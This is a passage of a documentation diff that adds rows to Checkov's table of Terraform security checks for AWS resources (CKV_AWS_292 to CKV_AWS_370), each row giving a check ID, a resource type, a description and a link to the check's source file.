+|  423 | CKV_AWS_292     | resource | aws_docdb_global_cluster                                | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted)                                                                                                                           | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py)                                                                       |
+|  424 | CKV_AWS_293     | resource | aws_db_instance                                         | Ensure that AWS database instances have deletion protection enabled                                                                                                                                      | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py)                                                                     |
+|  425 | CKV_AWS_294     | resource | aws_cloudtrail_event_data_store                         | Ensure CloudTrail Event Data Store uses CMK                                                                                                                                                              | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py)                                                                 |
+|  426 | CKV_AWS_295     | resource | aws_datasync_location_object_storage                    | Ensure DataSync Location Object Storage doesn't expose secrets                                                                                                                                           | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py)                                                                   |
+|  427 | CKV_AWS_296     | resource | aws_dms_endpoint                                        | Ensure DMS endpoint uses Customer Managed Key (CMK)                                                                                                                                                      | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py)                                                                                           |
+|  428 | CKV_AWS_297     | resource | aws_scheduler_schedule                                  | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK)                                                                                                                                    | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py)                                                                               |
+|  429 | CKV_AWS_298     | resource | aws_dms_s3_endpoint                                     | Ensure DMS S3 uses Customer Managed Key (CMK)                                                                                                                                                            | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py)                                                                                                       |
+|  430 | CKV_AWS_300     | resource | aws_s3_bucket_lifecycle_configuration                   | Ensure S3 lifecycle configuration sets period for aborting failed uploads                                                                                                                                | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py)                                                                               |
+|  431 | CKV_AWS_301     | resource | aws_lambda_permission                                   | Ensure that AWS Lambda function is not publicly accessible                                                                                                                                               | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py)                                                                             |
+|  432 | CKV_AWS_302     | resource | aws_db_snapshot                                         | Ensure DB Snapshots are not Public                                                                                                                                                                       | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py)                                                                                     |
+|  433 | CKV_AWS_303     | resource | aws_ssm_document                                        | Ensure SSM documents are not Public                                                                                                                                                                      | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py)                                                                                   |
+|  434 | CKV_AWS_304     | resource | aws_secretsmanager_secret_rotation                      | Ensure Secrets Manager secrets should be rotated within 90 days                                                                                                                                          | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py)                                                                             |
+|  435 | CKV_AWS_305     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distribution has a default root object configured                                                                                                                                      | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py)                                                             |
+|  436 | CKV_AWS_306     | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker notebook instances should be launched into a custom VPC                                                                                                                                 | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py)                                                                       |
+|  437 | CKV_AWS_307     | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker Users should not have root access to SageMaker notebook instances                                                                                                                       | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py)                                                                                     |
+|  438 | CKV_AWS_308     | resource | aws_api_gateway_method_settings                         | Ensure API Gateway method setting caching is set to encrypted                                                                                                                                            | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py)                                                   |
+|  439 | CKV_AWS_309     | resource | aws_apigatewayv2_route                                  | Ensure API GatewayV2 routes specify an authorization type                                                                                                                                                | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py)                                             |
+|  440 | CKV_AWS_310     | resource | aws_cloudfront_distribution                             | Ensure CloudFront distributions should have origin failover configured                                                                                                                                   | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py)                                                       |
+|  441 | CKV_AWS_311     | resource | aws_codebuild_project                                   | Ensure that CodeBuild S3 logs are encrypted                                                                                                                                                              | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py)                                                                               |
+|  442 | CKV_AWS_312     | resource | aws_elastic_beanstalk_environment                       | Ensure Elastic Beanstalk environments have enhanced health reporting enabled                                                                                                                             | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py)                                                 |
+|  443 | CKV_AWS_313     | resource | aws_rds_cluster                                         | Ensure RDS cluster configured to copy tags to snapshots                                                                                                                                                  | Terraform | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py)                                                                                           |
+|  444 | CKV_AWS_314     | resource | aws_codebuild_project                                   | Ensure CodeBuild project environments have a logging configuration                                                                                                                                       | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py)                                                                                               |
+|  445 | CKV_AWS_315     | resource | aws_autoscaling_group                                   | Ensure EC2 Auto Scaling groups use EC2 launch templates                                                                                                                                                  | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py)                                                                             |
+|  446 | CKV_AWS_316     | resource | aws_codebuild_project                                   | Ensure CodeBuild project environments do not have privileged mode enabled                                                                                                                                | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py)                                                                                 |
+|  447 | CKV_AWS_317     | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                                 |
+|  448 | CKV_AWS_317     | resource | aws_opensearch_domain                                   | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                                 |
+|  449 | CKV_AWS_318     | resource | aws_elasticsearch_domain                                | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                                     |
+|  450 | CKV_AWS_318     | resource | aws_opensearch_domain                                   | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                                     |
+|  451 | CKV_AWS_319     | resource | aws_cloudwatch_metric_alarm                             | Ensure that CloudWatch alarm actions are enabled                                                                                                                                                         | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py)                                                                                 |
+|  452 | CKV_AWS_320     | resource | aws_redshift_cluster                                    | Ensure Redshift clusters do not use the default database name                                                                                                                                            | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py)                                                                         |
+|  453 | CKV_AWS_321     | resource | aws_redshift_cluster                                    | Ensure Redshift clusters use enhanced VPC routing                                                                                                                                                        | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py)                                                       |
+|  454 | CKV_AWS_322     | resource | aws_elasticache_cluster                                 | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled                                                                                                                     | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py)                                                           |
+|  455 | CKV_AWS_323     | resource | aws_elasticache_cluster                                 | Ensure ElastiCache clusters do not use the default subnet group                                                                                                                                          | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py)                                                                           |
+|  456 | CKV_AWS_324     | resource | aws_rds_cluster                                         | Ensure that RDS Cluster log capture is enabled                                                                                                                                                           | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py)                                                                                             |
+|  457 | CKV_AWS_325     | resource | aws_rds_cluster                                         | Ensure that RDS Cluster audit logging is enabled for MySQL engine                                                                                                                                        | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py)                                                                                   |
+|  458 | CKV_AWS_326     | resource | aws_rds_cluster                                         | Ensure that RDS Aurora Clusters have backtracking enabled                                                                                                                                                | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py)                                                                             |
+|  459 | CKV_AWS_327     | resource | aws_rds_cluster                                         | Ensure RDS Clusters are encrypted using KMS CMKs                                                                                                                                                         | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py)                                                                           |
+|  460 | CKV_AWS_328     | resource | aws_alb                                                 | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  461 | CKV_AWS_328     | resource | aws_elb                                                 | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  462 | CKV_AWS_328     | resource | aws_lb                                                  | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                                     |
+|  463 | CKV_AWS_329     | resource | aws_efs_access_point                                    | EFS access points should enforce a root directory                                                                                                                                                        | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py)                                                                                           |
+|  464 | CKV_AWS_330     | resource | aws_efs_access_point                                    | EFS access points should enforce a user identity                                                                                                                                                         | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py)                                                                                     |
+|  465 | CKV_AWS_331     | resource | aws_ec2_transit_gateway                                 | Ensure Transit Gateways do not automatically accept VPC attachment requests                                                                                                                              | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py)                                                                         |
+|  466 | CKV_AWS_332     | resource | aws_ecs_service                                         | Ensure ECS Fargate services run on the latest Fargate platform version                                                                                                                                   | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py)                                                                                 |
+|  467 | CKV_AWS_333     | resource | aws_ecs_service                                         | Ensure ECS services do not have public IP addresses assigned to them automatically                                                                                                                       | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py)                                                                                           |
+|  468 | CKV_AWS_334     | resource | aws_ecs_task_definition                                 | Ensure ECS containers should run as non-privileged                                                                                                                                                       | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py)                                                                                     |
+|  469 | CKV_AWS_335     | resource | aws_ecs_task_definition                                 | Ensure ECS task definitions should not share the host's process namespace                                                                                                                                | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py)                                                                                 |
+|  470 | CKV_AWS_336     | resource | aws_ecs_task_definition                                 | Ensure ECS containers are limited to read-only access to root filesystems                                                                                                                                | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py)                                                                               |
+|  471 | CKV_AWS_337     | resource | aws_ssm_parameter                                       | Ensure SSM parameters are using KMS CMK                                                                                                                                                                  | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py)                                                                                         |
+|  472 | CKV_AWS_338     | resource | aws_cloudwatch_log_group                                | Ensure CloudWatch log groups retains logs for at least 1 year                                                                                                                                            | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py)                                                                 |
+|  473 | CKV_AWS_339     | resource | aws_eks_cluster                                         | Ensure EKS clusters run on a supported Kubernetes version                                                                                                                                                | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py)                                                                                           |
+|  474 | CKV_AWS_340     | resource | aws_elastic_beanstalk_environment                       | Ensure Elastic Beanstalk managed platform updates are enabled                                                                                                                                            | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py)                                                             |
+|  475 | CKV_AWS_341     | resource | aws_launch_configuration                                | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                             |
+|  476 | CKV_AWS_341     | resource | aws_launch_template                                     | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                             |
+|  477 | CKV_AWS_342     | resource | aws_waf_rule_group                                      | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  478 | CKV_AWS_342     | resource | aws_waf_web_acl                                         | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  479 | CKV_AWS_342     | resource | aws_wafregional_rule_group                              | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  480 | CKV_AWS_342     | resource | aws_wafregional_web_acl                                 | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  481 | CKV_AWS_342     | resource | aws_wafv2_rule_group                                    | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  482 | CKV_AWS_342     | resource | aws_wafv2_web_acl                                       | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  483 | CKV_AWS_343     | resource | aws_redshift_cluster                                    | Ensure Amazon Redshift clusters should have automatic snapshots enabled                                                                                                                                  | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py)                                                                                 |
+|  484 | CKV_AWS_344     | resource | aws_networkfirewall_firewall                            | Ensure that Network firewalls have deletion protection enabled                                                                                                                                           | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py)                                                             |
+|  485 | CKV_AWS_345     | resource | aws_networkfirewall_firewall                            | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                                   |
+|  486 | CKV_AWS_345     | resource | aws_networkfirewall_rule_group                          | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                                   |
+|  487 | CKV_AWS_346     | resource | aws_networkfirewall_firewall_policy                     | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK)                                                                                                | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py)                                                                 |
+|  488 | CKV_AWS_347     | resource | aws_neptune_cluster                                     | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                    | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py)                                                                   |
+|  489 | CKV_AWS_348     | resource | aws_iam_access_key                                      | Ensure IAM root user doesnt have Access keys                                                                                                                                                             | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py)                                                                                     |
+|  490 | CKV_AWS_349     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts local disks                                                                                                                                           | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py)                                                                 |
+|  491 | CKV_AWS_350     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts EBS disks                                                                                                                                             | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py)                                                                             |
+|  492 | CKV_AWS_351     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts InTransit                                                                                                                                             | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py)                                                                 |
+|  493 | CKV_AWS_352     | resource | aws_network_acl_rule                                    | Ensure NACL ingress does not allow all Ports                                                                                                                                                             | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py)                                                                                   |
+|  494 | CKV_AWS_353     | resource | aws_db_instance                                         | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                                   |
+|  495 | CKV_AWS_353     | resource | aws_rds_cluster_instance                                | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                                   |
+|  496 | CKV_AWS_354     | resource | aws_db_instance                                         | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                               |
+|  497 | CKV_AWS_354     | resource | aws_rds_cluster_instance                                | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                               |
+|  498 | CKV_AWS_355     | resource | aws_iam_group_policy                                    | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  499 | CKV_AWS_355     | resource | aws_iam_policy                                          | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  500 | CKV_AWS_355     | resource | aws_iam_role_policy                                     | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  501 | CKV_AWS_355     | resource | aws_iam_user_policy                                     | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  502 | CKV_AWS_355     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  503 | CKV_AWS_356     | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py)                                                                                       |
+|  504 | CKV_AWS_357     | resource | aws_transfer_server                                     | Ensure Transfer Server allows only secure protocols                                                                                                                                                      | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py)                                                 |
+|  505 | CKV_AWS_358     | data     | aws_iam_policy_document                                 | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization                                                                                                         | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py)                                                                           |
+|  506 | CKV_AWS_359     | resource | aws_neptune_cluster                                     | Neptune DB clusters should have IAM database authentication enabled                                                                                                                                      | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py)                             |
+|  507 | CKV_AWS_360     | resource | aws_docdb_cluster                                       | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py)                                                                                       |
+|  508 | CKV_AWS_361     | resource | aws_neptune_cluster                                     | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                                     |
+|  509 | CKV_AWS_362     | resource | aws_neptune_cluster                                     | Neptune DB clusters should be configured to copy tags to snapshots                                                                                                                                       | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py)                                                       |
+|  510 | CKV_AWS_363     | resource | aws_lambda_function                                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                                 |
+|  511 | CKV_AWS_364     | resource | aws_lambda_permission                                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py)                                                                                 |
+|  512 | CKV_AWS_365     | resource | aws_ses_configuration_set                               | Ensure SES Configuration Set enforces TLS usage                                                                                                                                                          | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py)                                                                     |
+|  513 | CKV_AWS_366     | resource | aws_cognito_identity_pool                               | Ensure AWS Cognito identity pool does not allow unauthenticated guest access                                                                                                                             | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py)                                                               |
+|  514 | CKV_AWS_367     | resource | aws_sagemaker_data_quality_job_definition               | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts                                                                                                                             | Terraform | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py)                                         |
+|  515 | CKV_AWS_368     | resource | aws_sagemaker_data_quality_job_definition               | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume                                                                                                             | Terraform | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py)                             |
+|  516 | CKV_AWS_369     | resource | aws_sagemaker_data_quality_job_definition               | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs                                                                                          | Terraform | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py)                           |
+|  517 | CKV_AWS_370     | resource | aws_sagemaker_model                                     | Ensure Amazon SageMaker model uses network isolation                                                                                                                                                     | Terraform | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py)                                                           |
